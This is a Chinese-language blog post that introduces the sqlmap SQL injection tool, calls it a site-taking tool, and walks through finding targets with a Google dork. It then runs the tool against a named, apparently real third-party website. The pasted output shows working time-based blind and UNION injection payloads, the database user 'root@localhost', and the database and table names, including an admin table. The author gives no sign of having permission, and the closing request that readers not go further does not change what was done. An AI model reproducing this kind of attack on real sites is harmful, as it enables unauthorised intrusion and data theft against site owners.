一 什么是sqlmap
1 sqlmap is an open source penetration testing tool that automates the 2 process of detecting and exploiting SQL injection flaws and taking over of 3 database servers. It comes with a powerful detection engine, many niche 4 features for the ultimate penetration tester and a broad range of switches 5 lasting from database fingerprinting, over data fetching from the 6 database, 7 to accessing the underlying file system and executing commands on the 8 operating system via out-of-band connections.
sqlmap 是一個開源的自動探測和發現sql注入漏洞以及拿下數據庫服務器的工具.它有一個強大的探測引擎,許多有些的特性支持探測服務器以及拿下數據庫服務器.
** 簡言之 sqlmap 是個拿站工具.
二 安裝.
python 2.6 或2.7 ,mark 只是這兩個主版本.sqlmap 安裝可以用easy_install 或者用git clone 從倉庫拿.
三 尋站
google hack 啊, inurl:\".php\?id=
就試下第二個吧.www.cowinbio.com/about/index.php?id=1
開干
1 blind (heavy query)' injectable 2 [10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' 3 [10:07:47] [INFO] automatically extending ranges for UNION query injection tech 4 ique tests as there is at least one other (potential) technique found 5 [10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns 6 [10:07:49] [WARNING] combined UNION/error-based SQL injection case found on col 7 mn 1. sqlmap will try to find another column with better characteristics 8 [10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 c 9 lumns' injectable 10 GET parameter 'id' is vulnerable. Do you want to keep testing the others (if an 11 )? [y/N] n 12 sqlmap identified the following injection point(s) with a total of 2626 HTTP(s) 13 requests: 14 --- 15 Parameter: id (GET) 16 Type: AND/OR time-based blind
然后
1 _ 2 ___ ___| |_____ ___ ___ {1.0-dev-c6d4217} 3 |_ -| . | | | .'| . | 4 |___|_ |_|_|_|_|__,| _| 5 |_| |_| http://sqlmap.org 6 7 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu 8 consent is illegal. It is the end user's responsibility to obey all applicabl 9 local, state and federal laws. Developers assume no liability and are not resp 10 sible for any misuse or damage caused by this program 11 12 [*] starting at 10:15:04 13 14 you provided 'MySQL' as a back-end DBMS, but from a past scan information on t 15 target URL sqlmap assumes the back-end DBMS is 'mysql <5.0.11'. Do you really 16 ant to force the back-end DBMS value? [y/N] y 17 [10:15:22] [INFO] testing connection to the target URL 18 [10:15:22] [WARNING] there is a DBMS error found in the HTTP response body whi 19 could interfere with the results of the tests 20 [10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/ 21 S 22 sqlmap resumed the following injection point(s) from stored session: 23 --- 24 Parameter: id (GET) 25 Type: AND/OR time-based blind 26 Title: MySQL <= 5.0.11 AND time-based blind (heavy query) 27 Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a)) 28 29 Type: UNION query 30 Title: Generic UNION query (NULL) - 2 columns 31 Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a7 32 7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NU 33 -- - 34 --- 35 [10:15:23] [INFO] testing MySQL 36 [10:15:23] [INFO] confirming MySQL 37 [10:15:23] [INFO] the back-end DBMS is MySQL 38 web application technology: PHP 5.6.9 39 back-end DBMS: MySQL < 5.0.0 40 [10:15:23] [INFO] fetching current user 41 current user: 'root@localhost'
再之后
_ ___ ___| |_____ ___ ___ {1.0-dev-c6d4217} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respo sible for any misuse or damage caused by this program [*] starting at 10:16:44 [10:16:44] [INFO] testing connection to the target URL [10:16:44] [WARNING] there is a DBMS error found in the HTTP response body whic could interfere with the results of the tests [10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/I S sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a)) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a79 7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NUL -- - --- [10:16:45] [INFO] testing MySQL [10:16:45] [INFO] confirming MySQL [10:16:45] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.9 back-end DBMS: MySQL < 5.0.0 [10:16:45] [INFO] fetching current database current database: 'cw'
1 Database: cw 2 [3 tables] 3 +---------+ 4 | admin | 5 | news | 6 | product | 7 +---------+
就到這里吧. 畢竟是寫博客.本人並沒有再進一步深入,希望各位看官也不要再進一步嘗試了.
另外友情提醒這個站 ,你們不太安全.
鄭重聲明以上文章本人原創,轉載請標明出處. 小三爺 此處謝過了~~.